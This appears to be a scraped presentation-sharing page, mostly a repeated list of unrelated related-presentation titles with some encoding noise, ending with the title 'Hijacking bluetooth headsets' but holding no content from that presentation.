Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...
ย 
Bonku-Babus-Friend by Sathyajith Ray (9)
Bonku-Babus-Friend by Sathyajith Ray  (9)Bonku-Babus-Friend by Sathyajith Ray  (9)
Bonku-Babus-Friend by Sathyajith Ray (9)
ย 
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) Curriculum
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) CurriculumPhilippine Edukasyong Pantahanan at Pangkabuhayan (EPP) Curriculum
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) Curriculum
ย 
Oliver Asks for More by Charles Dickens (9)
Oliver Asks for More by Charles Dickens (9)Oliver Asks for More by Charles Dickens (9)
Oliver Asks for More by Charles Dickens (9)
ย 
HYPERTENSION - SLIDE SHARE PRESENTATION.
HYPERTENSION - SLIDE SHARE PRESENTATION.HYPERTENSION - SLIDE SHARE PRESENTATION.
HYPERTENSION - SLIDE SHARE PRESENTATION.
ย 
A Visual Guide to 1 Samuel | A Tale of Two Hearts
A Visual Guide to 1 Samuel | A Tale of Two HeartsA Visual Guide to 1 Samuel | A Tale of Two Hearts
A Visual Guide to 1 Samuel | A Tale of Two Hearts
ย 
220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx
ย 
NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...
NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...
NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...
ย 
Educational Technology in the Health Sciences
Educational Technology in the Health SciencesEducational Technology in the Health Sciences
Educational Technology in the Health Sciences
ย 
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.pptLevel 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
ย 
RESULTS OF THE EVALUATION QUESTIONNAIRE.pptx
RESULTS OF THE EVALUATION QUESTIONNAIRE.pptxRESULTS OF THE EVALUATION QUESTIONNAIRE.pptx
RESULTS OF THE EVALUATION QUESTIONNAIRE.pptx
ย 
Skimbleshanks-The-Railway-Cat by T S Eliot
Skimbleshanks-The-Railway-Cat by T S EliotSkimbleshanks-The-Railway-Cat by T S Eliot
Skimbleshanks-The-Railway-Cat by T S Eliot
ย 
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
ย 
CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...
CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...
CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...
ย 
Data Structure using C by Dr. K Adisesha .ppsx
Data Structure using C by Dr. K Adisesha .ppsxData Structure using C by Dr. K Adisesha .ppsx
Data Structure using C by Dr. K Adisesha .ppsx
ย 
How to Manage Reception Report in Odoo 17
How to Manage Reception Report in Odoo 17How to Manage Reception Report in Odoo 17
How to Manage Reception Report in Odoo 17
ย 
Electric Fetus - Record Store Scavenger Hunt
Electric Fetus - Record Store Scavenger HuntElectric Fetus - Record Store Scavenger Hunt
Electric Fetus - Record Store Scavenger Hunt
ย 
Wound healing PPT
Wound healing PPTWound healing PPT
Wound healing PPT
ย 
Juneteenth Freedom Day 2024 David Douglas School District
Juneteenth Freedom Day 2024 David Douglas School DistrictJuneteenth Freedom Day 2024 David Douglas School District
Juneteenth Freedom Day 2024 David Douglas School District
ย 

Hijacking bluetooth headsets